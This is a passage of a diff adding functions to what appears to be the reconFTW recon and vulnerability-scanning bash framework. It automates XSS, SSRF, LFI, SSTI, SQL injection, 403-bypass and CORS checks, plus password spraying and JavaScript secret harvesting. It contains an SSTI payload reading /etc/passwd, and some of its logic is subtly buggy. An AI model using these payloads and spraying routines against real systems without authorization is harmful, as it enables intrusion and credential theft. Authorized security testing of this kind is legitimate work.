-f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$URL_EXT" = true ] + then + ext=("7z" "achee" "action" "adr" "apk" "arj" "ascx" "asmx" "asp" "aspx" "axd" "backup" "bak" "bat" "bin" "bkf" "bkp" "bok" "cab" "cer" "cfg" "cfm" "cfml" "cgi" "cnf" "conf" "config" "cpl" "crt" "csr" "csv" "dat" "db" "dbf" "deb" "dmg" "dmp" "doc" "docx" "drv" "email" "eml" "emlx" "env" "exe" "gadget" "gz" "html" "ica" "inf" "ini" "iso" "jar" "java" "jhtml" "json" "jsp" "key" "log" "lst" "mai" "mbox" "mbx" "md" "mdb" "msg" "msi" "nsf" "ods" "oft" "old" "ora" "ost" "pac" "passwd" "pcf" "pdf" "pem" "pgp" "php" "php3" "php4" "php5" "phtm" "phtml" "pkg" "pl" "plist" "pst" "pwd" "py" "rar" "rb" "rdp" "reg" "rpm" "rtf" "sav" "sh" "shtm" "shtml" "skr" "sql" "swf" "sys" "tar" "tar.gz" "tmp" "toast" "tpl" "txt" "url" "vcd" "vcf" "wml" "wpd" "wsdl" "wsf" "xls" "xlsm" "xlsx" "xml" "xsd" "yaml" "yml" "z" "zip") + echo "" > webs/url_extract.txt + for t in ${ext[@]}; do + NUMOFLINES=$(cat .tmp/url_extract_tmp.txt | egrep -i "\.(${t})($|\/|\?)" | sort -u | wc -l) + if [[ ${NUMOFLINES} -gt 0 ]]; then + echo -e "\n############################\n + ${t} + \n############################\n" >> webs/urls_by_ext.txt + cat .tmp/url_extract_tmp.txt | egrep -i "\.(${t})($|\/|\?)" | sort -u >> webs/urls_by_ext.txt + fi + done + end_func "Results are saved in webs/urls_by_ext.txt" ${FUNCNAME[0]} + else + if [ "$URL_EXT" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function jschecks(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$JSCHECKS" = true ] + then + start_func "Javascript Scan" + if [ -s "js/url_extract_js.txt" ] + then + printf "${yellow} Running : Fetching Urls 1/5${reset}\n" + cat js/url_extract_js.txt | cut -d '?' 
-f 1 | grep -iE "\.js$" | anew -q js/jsfile_links.txt + cat js/url_extract_js.txt | subjs | anew -q js/jsfile_links.txt + printf "${yellow} Running : Resolving JS Urls 2/5${reset}\n" + eval axiom-scan js/jsfile_links.txt -m httpx -follow-host-redirects -random-agent -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color -o .tmp/js_livelinks.txt $DEBUG_STD && cat .tmp/js_livelinks.txt | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt + printf "${yellow} Running : Gathering endpoints 3/5${reset}\n" + interlace -tL js/js_livelinks.txt -threads 10 -c "python3 $tools/LinkFinder/linkfinder.py -d -i _target_ -o cli >> .tmp/js_endpoints.txt" &>/dev/null + if [ -s ".tmp/js_endpoints.txt" ] + then + eval sed -i '/^\//!d' .tmp/js_endpoints.txt $DEBUG_STD + cat .tmp/js_endpoints.txt | anew -q js/js_endpoints.txt.txt + fi + printf "${yellow} Running : Gathering secrets 4/5${reset}\n" + eval axiom-scan js/js_livelinks.txt -m nuclei -wL /home/op/recon/nuclei/nuclei-templates/exposed-tokens/ -r $resolvers_trusted -o nuclei_js/js_secrets.txt $DEBUG_STD + printf "${yellow} Running : Building wordlist 5/5${reset}\n" + if [ -s "js/js_livelinks.txt" ] + then + cat js/js_livelinks.txt | eval python3 $tools/getjswords.py $DEBUG_ERROR | anew -q webs/dict_words.txt + fi + end_func "Results are saved in js folder" ${FUNCNAME[0]} + else + end_func "No JS urls found, function skipped" ${FUNCNAME[0]} + fi + else + if [ "$JSCHECKS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function wordlist_gen(){ + if ([ ! 
-f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WORDLIST" = true ] + then + start_func "Wordlist generation" + cat .tmp/url_extract_tmp.txt | unfurl -u keys | sed 's/[][]//g' | sed 's/[#]//g' | sed 's/[}{]//g' | anew -q webs/dict_words.txt + cat .tmp/url_extract_tmp.txt | unfurl -u values | sed 's/[][]//g' | sed 's/[#]//g' | sed 's/[}{]//g' | anew -q webs/dict_words.txt + cat .tmp/url_extract_tmp.txt | tr "[:punct:]" "\n" | anew -q webs/dict_words.txt + if [ -s ".tmp/js_endpoints.txt" ] + then + cat .tmp/js_endpoints.txt | unfurl -u path | anew -q webs/dict_paths.txt + fi + cat .tmp/url_extract_tmp.txt | unfurl -u path | anew -q webs/dict_paths.txt + end_func "Results are saved in webs/dict_[words|paths].txt" ${FUNCNAME[0]} + else + if [ "$WORDLIST" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +############################################################################################################### +######################################### VULNERABILITIES ##################################################### +############################################################################################################### + +function brokenLinks(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$BROKENLINKS" = true ] ; then + start_func "Broken links checks" + if [ ! 
-s ".tmp/gospider.txt" ] ; + then + if [ "$DEEP" = true ] ; then + eval axiom-scan .tmp/probed_tmp_scrap.txt -m gospider --js -d 3 --sitemap --robots -w -r -o .tmp/gospider $DEBUG_STD + else + eval axiom-scan .tmp/probed_tmp_scrap.txt -m gospider --js -d 2 --sitemap --robots -w -r -o .tmp/gospider $DEBUG_STD + fi + cat .tmp/gospider/* | sed '/^.\{2048\}./d' | anew -q .tmp/gospider.txt + fi + cat .tmp/gospider.txt | egrep -o 'https?://[^ ]+' | sed 's/]$//' | sort -u | httpx -follow-redirects -status-code -threads $HTTPX_THREADS -timeout 15 -silent -retries 2 -no-color | grep "\[4" | cut -d ' ' -f1 | anew -q .tmp/brokenLinks_total.txt + NUMOFLINES=$(eval cat .tmp/brokenLinks_total.txt $DEBUG_ERROR | anew webs/brokenLinks.txt | wc -l) + notification "${NUMOFLINES} new broken links found" info + end_func "Results are saved in webs/brokenLinks.txt" ${FUNCNAME[0]} + else + if [ "$BROKENLINKS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function xss(){ + if ([ ! 
-f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$XSS" = true ] && [ -s "gf/xss.txt" ] + then + start_func "XSS Analysis" + cat gf/xss.txt | qsreplace FUZZ | Gxss -c 100 -p Xss | anew -q .tmp/xss_reflected.txt + if [ "$DEEP" = true ] ; then + if [ -n "$XSS_SERVER" ]; then + eval cat .tmp/xss_reflected.txt | dalfox pipe --silence --no-color --no-spinner --mass --mass-worker 100 --multicast --skip-bav -b ${XSS_SERVER} -w $DALFOX_THREADS $DEBUG_ERROR | anew -q vulns/xss.txt + else + printf "${yellow}\n No XSS_SERVER defined, blind xss skipped\n\n" + eval cat .tmp/xss_reflected.txt | dalfox pipe --silence --no-color --no-spinner --mass --mass-worker 100 --multicast --skip-bav -w $DALFOX_THREADS $DEBUG_ERROR | anew -q vulns/xss.txt + fi + else + if [[ $(cat .tmp/xss_reflected.txt | wc -l) -le 500 ]] + then + if [ -n "$XSS_SERVER" ]; then + eval cat .tmp/xss_reflected.txt | dalfox pipe --silence --no-color --no-spinner --mass --mass-worker 100 --multicast --skip-bav --skip-grepping --skip-mining-all --skip-mining-dict -b ${XSS_SERVER} -w $DALFOX_THREADS $DEBUG_ERROR | anew -q vulns/xss.txt + else + printf "${yellow}\n No XSS_SERVER defined, blind xss skipped\n\n" + eval cat .tmp/xss_reflected.txt | dalfox pipe --silence --no-color --no-spinner --mass --mass-worker 100 --multicast --skip-bav --skip-grepping --skip-mining-all --skip-mining-dict -w $DALFOX_THREADS $DEBUG_ERROR | anew -q vulns/xss.txt + fi + else + printf "${bred} Skipping XSS: Too Much URLs to test, try with --deep flag${reset}\n" + fi + fi + end_func "Results are saved in vulns/xss.txt" ${FUNCNAME[0]} + else + if [ "$XSS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + elif [ ! 
-s "gf/xss.txt" ]; then + printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to XSS ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function cors(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$CORS" = true ] + then + start_func "CORS Scan" + eval python3 $tools/Corsy/corsy.py -i webs/webs.txt > webs/cors.txt $DEBUG_STD + eval cat webs/cors.txt $DEBUG_ERROR + end_func "Results are saved in webs/cors.txt" ${FUNCNAME[0]} + else + if [ "$CORS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function open_redirect(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$OPEN_REDIRECT" = true ] && [ -s "gf/redirect.txt" ] + then + start_func "Open redirects checks" + if [ "$DEEP" = true ] ; then + cat gf/redirect.txt | qsreplace FUZZ | anew -q .tmp/tmp_redirect.txt + eval python3 $tools/OpenRedireX/openredirex.py -l .tmp/tmp_redirect.txt --keyword FUZZ -p $tools/OpenRedireX/payloads.txt $DEBUG_ERROR | grep "^http" > vulns/redirect.txt + sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" vulns/redirect.txt + end_func "Results are saved in vulns/redirect.txt" ${FUNCNAME[0]} + else + if [[ $(cat gf/redirect.txt | wc -l) -le 1000 ]] + then + cat gf/redirect.txt | qsreplace FUZZ | anew -q .tmp/tmp_redirect.txt + eval python3 $tools/OpenRedireX/openredirex.py -l .tmp/tmp_redirect.txt --keyword FUZZ -p $tools/OpenRedireX/payloads.txt $DEBUG_ERROR | grep "^http" > vulns/redirect.txt + sed -r -i "s/\x1B\[([0-9]{1,3}(;[0-9]{1,2})?)?[mGK]//g" vulns/redirect.txt + end_func "Results are saved in vulns/redirect.txt" ${FUNCNAME[0]} + else + printf 
"${bred} Skipping Open redirects: Too Much URLs to test, try with --deep flag${reset}\n" + printf "${bgreen}#######################################################################${reset}\n" + fi + fi + else + if [ "$OPEN_REDIRECT" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + elif [ ! -s "gf/redirect.txt" ]; then + printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to Open Redirect ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function ssrf_checks(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SSRF_CHECKS" = true ] && [ -s "gf/ssrf.txt" ] + then + if [ -n "$COLLAB_SERVER" ]; then + start_func "SSRF checks" + if [ "$DEEP" = true ] ; then + cat gf/ssrf.txt | qsreplace FUZZ | anew -q .tmp/tmp_ssrf.txt + COLLAB_SERVER_FIX=$(echo $COLLAB_SERVER | sed -r "s/https?:\/\///") + echo $COLLAB_SERVER_FIX | anew -q .tmp/ssrf_server.txt + echo $COLLAB_SERVER | anew -q .tmp/ssrf_server.txt + for url in $(cat .tmp/tmp_ssrf.txt); do + ffuf -v -H "${HEADER}" -t $FFUF_THREADS -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt + done + eval python3 $tools/ssrf.py $dir/gf/ssrf.txt $COLLAB_SERVER_FIX $DEBUG_ERROR | anew -q vulns/ssrf.txt + end_func "Results are saved in vulns/ssrf.txt" ${FUNCNAME[0]} + else + if [[ $(cat gf/ssrf.txt | wc -l) -le 1000 ]] + then + cat gf/ssrf.txt | qsreplace FUZZ | anew -q .tmp/tmp_ssrf.txt + COLLAB_SERVER_FIX=$(echo $COLLAB_SERVER | sed -r "s/https?:\/\///") + echo $COLLAB_SERVER_FIX | anew -q .tmp/ssrf_server.txt + echo $COLLAB_SERVER | anew -q .tmp/ssrf_server.txt + for url in $(cat .tmp/tmp_ssrf.txt); do + ffuf -v -H "${HEADER}" -t $FFUF_THREADS -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt + 
done + eval python3 $tools/ssrf.py $dir/gf/ssrf.txt $COLLAB_SERVER_FIX $DEBUG_ERROR | anew -q vulns/ssrf.txt + end_func "Results are saved in vulns/ssrf.txt" ${FUNCNAME[0]} + else + printf "${bred} Skipping SSRF: Too Much URLs to test, try with --deep flag${reset}\n" + fi + fi + else + notification "No COLLAB_SERVER defined" error + end_func "Skipping function" ${FUNCNAME[0]} + printf "${bgreen}#######################################################################${reset}\n" + fi + else + if [ "$SSRF_CHECKS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + elif [ ! -s "gf/ssrf.txt" ]; then + printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to SSRF ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function crlf_checks(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$CRLF_CHECKS" = true ] + then + start_func "CRLF checks" + eval crlfuzz -l webs/webs.txt -o vulns/crlf.txt $DEBUG_STD + end_func "Results are saved in vulns/crlf.txt" ${FUNCNAME[0]} + else + if [ "$CRLF_CHECKS" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function lfi(){ + if ([ ! 
-f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$LFI" = true ] && [ -s "gf/lfi.txt" ] + then + start_func "LFI checks" + cat gf/lfi.txt | qsreplace FUZZ | anew -q .tmp/tmp_lfi.txt + for url in $(cat .tmp/tmp_lfi.txt); do + ffuf -v -mc 200 -t $FFUF_THREADS -H "${HEADER}" -w $lfi_wordlist -u $url -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/lfi.txt + done + end_func "Results are saved in vulns/lfi.txt" ${FUNCNAME[0]} + else + if [ "$LFI" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + elif [ ! -s "gf/lfi.txt" ]; then + printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to LFI ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function ssti(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SSTI" = true ] && [ -s "gf/ssti.txt" ] + then + start_func "SSTI checks" + cat gf/ssti.txt | qsreplace "ssti{{7*7}}" | anew -q .tmp/ssti_fuzz.txt + ffuf -v -mc 200 -t $FFUF_THREADS -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "ssti49" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt + cat gf/ssti.txt | qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/passwd').read()}}" | anew -q .tmp/ssti_fuzz2.txt + ffuf -v -mc 200 -t $FFUF_THREADS -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt + end_func "Results are saved in vulns/ssti.txt" ${FUNCNAME[0]} + else + if [ "$SSTI" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + elif [ ! 
-s "gf/ssti.txt" ]; then + printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to SSTI ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function sqli(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SQLI" = true ] && [ -s "gf/sqli.txt" ] + then + start_func "SQLi checks" + cat gf/sqli.txt | qsreplace FUZZ | anew -q .tmp/tmp_sqli.txt + interlace -tL .tmp/tmp_sqli.txt -threads 10 -c "python3 $tools/sqlmap/sqlmap.py -u _target_ -b --batch --disable-coloring --random-agent --output-dir=sqlmap" &>/dev/null + end_func "Results are saved in sqlmap folder" ${FUNCNAME[0]} + else + if [ "$SQLI" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + elif [ ! -s "gf/sqli.txt" ]; then + printf "\n${yellow} ${FUNCNAME[0]} No URLs potentially vulnerables to SQLi ${reset}\n\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function test_ssl(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$TEST_SSL" = true ] + then + start_func "SSL Test" + eval $tools/testssl.sh/testssl.sh --quiet --color 0 -U -iL hosts/ips.txt $DEBUG_ERROR > hosts/testssl.txt + end_func "Results are saved in hosts/testssl.txt" ${FUNCNAME[0]} + else + if [ "$TEST_SSL" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function spraying(){ + if ([ ! 
-f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$SPRAY" = true ] + then + start_func "Password spraying" + cd $tools/brutespray + eval python3 $tools/brutespray/brutespray.py --file $dir/.tmp/nmap_grep.gnmap --threads $BRUTESPRAY_THREADS --hosts $BRUTESPRAY_CONCURRENCE -o $dir/hosts/brutespray.txt $DEBUG_STD + cd $dir + end_func "Results are saved in hosts/brutespray.txt" ${FUNCNAME[0]} + else + if [ "$SPRAY" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +function 4xxbypass(){ + if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$BYPASSER4XX" = true ] + then + start_func "403 bypass" + eval cat fuzzing/*.txt $DEBUG_ERROR | egrep '^4' | egrep -v '^404' | cut -d ' ' -f3 | dirdar -only-ok > .tmp/dirdar.txt + eval cat .tmp/dirdar.txt $DEBUG_ERROR | sed -e '1,12d' | sed '/^$/d' | anew -q vulns/4xxbypass.txt + end_func "Results are saved in vulns/4xxbypass.txt" ${FUNCNAME[0]} + else + if [ "$BYPASSER4XX" = false ]; then + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n" + else + printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" + fi + fi +} + +############################################################################################################### +########################################## OPTIONS & MGMT ##################################################### +############################################################################################################### + +function deleteOutScoped(){ + if [ -z "$1" ] + then + cat $1 | while read outscoped + do + if grep -q "^[*]" <<< $outscoped + then + outscoped="${outscoped:1}" + sed -i /"$outscoped$"/d $2 + 
else + sed -i /$outscoped/d $2 + fi + done + fi +} + +function getElapsedTime { + runtime="" + local T=$2-$1 + local D=$((T/60/60/24)) + local H=$((T/60/60%24)) + local M=$((T/60%60)) + local S=$((T%60)) + (( $D > 0 )) && runtime="$runtime$D days, " + (( $H > 0 )) && runtime="$runtime$H hours, " + (( $M > 0 )) && runtime="$runtime$M minutes, " + runtime="$runtime$S seconds." +} + +function isAsciiText { + IS_ASCII="False"; + if [[ $(file $1 | grep -o 'ASCII text$') == "ASCII text" ]] + then + IS_ASCII="True"; + else + IS_ASCII="False"; + fi +} + +function output(){ + mkdir -p $dir_output + mv $dir $dir_output +} + +function notification(){ + if [ ! -z "$1" ] && [ ! -z "$2" ] + then + case $2 in + info) + text="\n${bblue} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY + ;; + warn) + text="\n${yellow} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY + ;; + error) + text="\n${bred} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY + ;; + good) + text="\n${bgreen} ${1} ${reset}" + printf "${text}\n" && printf "${text} - ${domain}\n" | $NOTIFY + ;; + esac + fi +} + +function start_func(){ + printf "${bgreen}#######################################################################" + notification "${1}" info + start=`date +%s` +} + +function end_func(){ + touch $called_fn_dir/.${2} + end=`date +%s` + getElapsedTime $start $end + notification "${2} Finished in ${runtime}" info + printf "${bblue} ${1} ${reset}\n" + printf "${bgreen}#######################################################################${reset}\n" +} + +function start_subfunc(){ + notification "${1}" warn + start_sub=`date +%s` +} + +function end_subfunc(){ + touch $called_fn_dir/.${2} + end_sub=`date +%s` + getElapsedTime $start_sub $end_sub + notification "${1} in ${runtime}" good +} + +function start(){ + + global_start=`date +%s` + + if [ "$NOTIFICATION" = true ] ; then + NOTIFY="notify -silent" + else + 
NOTIFY="" + fi + + echo "Recon succesfully started on $domain" | $NOTIFY + tools_installed + + if [ -z "$domain" ] + then + if [ -n "$list" ] + then + if [ -z "$domain" ] + then + domain="Multi" + dir=$SCRIPTPATH/Recon/$domain + called_fn_dir=$dir/.called_fn + fi + if [[ "$list" = /* ]]; then + install -D $list $dir/webs/webs.txt + else + install -D $SCRIPTPATH/$list $dir/webs/webs.txt + fi + fi + else + dir=$SCRIPTPATH/Recon/$domain + called_fn_dir=$dir/.called_fn + fi + + if [ -z "$domain" ] + then + notification "\n\n${bred} No domain or list provided ${reset}\n\n" error + exit + fi + + if [ ! -d "$called_fn_dir" ] + then + mkdir -p $called_fn_dir + fi + + cd $dir + if [ ! -z "$domain" ] + then + echo $domain | anew -q target.txt + list=${dir}/target.txt + fi + mkdir -p .tmp osint subdomains webs hosts vulns + + if [ ! -z "$findomain_virustotal_token" ] + then + VT_API_KEY=$findomain_virustotal_token + fi + + printf "\n" + printf "${bred} Target: ${domain}\n\n" +} + +#Don't call me, I am not finished yet +function html_report(){ + eval cp "static/index.html" $dir $DEBUG_ERROR + #changing title to target.com + sed -i "s/CHANGE_ME_TITLE/$domain/g" "$dir/index.html" + #subdomains + lineToAppend="" + if [ -f "$dir/subdomains/subdomains.txt" ]; then + cat $dir/subdomains/subdomains.txt | while read sub; do lineToAppend="$lineToAppend
  • $sub

  • " ; done + else + lineToAppend="
  • No Subdomains Found For Target

  • " + fi + sed -i "s/CHANGE_ME_SUB_DOMAINS/$lineToAppend/g" "$dir/index.html" + #Screenshots + lineToAppend="" + + #OSINT + lineToAppend="" + # @TODO concatinate dorks and links and create a table cia HTML + tmpDorks=$(cat $dir/osint/gitdorks.txt | grep git | cut -d'|' -f 1 | cut -d'=' -f 2) + tmpLinks=$(cat $dir/osint/gitdorks.txt | grep git | cut -d'|' -f 2) +} + +function end(){ + find $dir -type f -empty | grep -v "called_fn" | xargs rm -f &>/dev/null + find $dir -type d -empty | grep -v "called_fn" | xargs rm -rf &>/dev/null + + if [ "$REMOVETMP" = true ] + then + rm -rf $dir/.tmp + fi + + if [ -n "$dir_output" ] + then + output + finaldir=$dir_output + else + finaldir=$dir + fi + global_end=`date +%s` + getElapsedTime $global_start $global_end + printf "${bgreen}#######################################################################${reset}\n" + text="${bred} Finished Recon on: ${domain} under ${finaldir} in: ${runtime} ${reset}\n" + printf "${text}" && printf "${text}" | $NOTIFY + printf "${bgreen}#######################################################################${reset}\n" + #Seperator for more clear messges in telegram_Bot + echo "****** Stay safe 🦠 and secure 🔐 ******" | $NOTIFY +} + +############################################################################################################### +########################################### MODES & MENUS ##################################################### +############################################################################################################### + +function passive(){ + start + domain_info + emails + google_dorks + github_dorks + metadata + SUBSCRAPING=false + WEBPROBESIMPLE=false + subdomains_full + favicon + PORTSCAN_ACTIVE=false + portscan + cloudprovider + end +} + +function all(){ + start + recon + 4xxbypass + cors + open_redirect + ssrf_checks + crlf_checks + lfi + ssti + sqli + xss + spraying + brokenLinks + test_ssl + end +} + +function recon(){ + domain_info + emails + 
google_dorks + github_dorks + metadata + subdomains_full + subtakeover + zonetransfer + s3buckets + webprobe_full + screenshot + favicon + portscan + cloudprovider + waf_checks + nuclei_check + cms_scanner + fuzz + params + urlchecks + url_gf + jschecks + wordlist_gen +} + +function multi_recon(){ + + + global_start=`date +%s` + + if [ "$NOTIFICATION" = true ] ; then + NOTIFY="notify -silent" + else + NOTIFY="" + fi + + if [ -s "$list" ] + then + targets=$(cat $list) + else + notification "Target list not provided" error + exit + fi + workdir=$SCRIPTPATH/Recon/$multi + mkdir -p $workdir && cd $workdir + mkdir -p .tmp .called_fn osint subdomains webs hosts vulns + + if [[ ! $(cat ~/.axiom/selected.conf | sed '/^\s*$/d' | wc -l) -gt 0 ]] + then + notification "\n\n${bred} No axiom instances selected ${reset}\n\n" error + exit + fi + + for domain in $targets; do + dir=$workdir/targets/$domain + called_fn_dir=$dir/.called_fn + mkdir -p $dir + cd $dir + mkdir -p .tmp .called_fn osint subdomains webs hosts vulns + domain_info + emails + google_dorks + github_dorks + metadata + subdomains_full + subtakeover + zonetransfer + webprobe_full + screenshot + favicon + done + cd $workdir + + notification "############################# Total data ############################" info + NUMOFLINES_users_total=$(find . -type f -name 'users.txt' -exec cat {} + | anew -q osint/users.txt | wc -l) + NUMOFLINES_pwndb_total=$(find . -type f -name 'passwords.txt' -exec cat {} + | anew -q osint/passwords.txt | wc -l) + NUMOFLINES_software_total=$(find . -type f -name 'software.txt' -exec cat {} + | anew -q osint/software.txt | wc -l) + NUMOFLINES_authors_total=$(find . -type f -name 'authors.txt' -exec cat {} + | anew -q osint/authors.txt | wc -l) + NUMOFLINES_subs_total=$(find . -type f -name 'subdomains.txt' -exec cat {} + | anew -q subdomains/subdomains.txt | wc -l) + NUMOFLINES_subtko_total=$(find . 
-type f -name 'takeover.txt' -exec cat {} + | anew -q webs/takeover.txt | wc -l) + NUMOFLINES_webs_total=$(find . -type f -name 'webs.txt' -exec cat {} + | anew -q webs/webs.txt | wc -l) + NUMOFLINES_webs_total=$(find . -type f -name 'webs_uncommon_ports.txt' -exec cat {} + | anew -q webs/webs_uncommon_ports.txt | wc -l) + + notification "- ${NUMOFLINES_users_total} total users found" good + notification "- ${NUMOFLINES_pwndb_total} total creds leaked" good + notification "- ${NUMOFLINES_software_total} total software found" good + notification "- ${NUMOFLINES_authors_total} total authors found" good + notification "- ${NUMOFLINES_subs_total} total subdomains" good + notification "- ${NUMOFLINES_subtko_total} total probably subdomain takeovers" good + notification "- ${NUMOFLINES_webs_total} total websites" good + + portscan + cloudprovider + s3buckets + waf_checks + nuclei_check + for domain in $targets; do + dir=$workdir/targets/$domain + cd $dir + cms_scanner + fuzz + params + urlchecks + url_gf + jschecks + wordlist_gen + done + cd $workdir + dir=$workdir + domain=$multi + end +} + +function subs_menu(){ + start + subdomains_full + subtakeover + zonetransfer + s3buckets + end +} + +function help(){ + printf "\n Usage: $0 [-d domain.tld] [-m name] [-l list.txt] [-x oos.txt] [-i in.txt] " + printf "\n [-r] [-s] [-p] [-a] [-w] [-i] [-v] [-h] [--deep] [--fs] [-o OUTPUT]\n\n" + printf " ${bblue}TARGET OPTIONS${reset}\n" + printf " -d domain.tld Target domain\n" + printf " -m company Target company name\n" + printf " -l list.txt Targets list, one per line\n" + printf " -x oos.txt Exclude subdomains list (Out Of Scope)\n" + printf " -i in.txt Include subdomains list\n" + printf " \n" + printf " ${bblue}MODE OPTIONS${reset}\n" + printf " 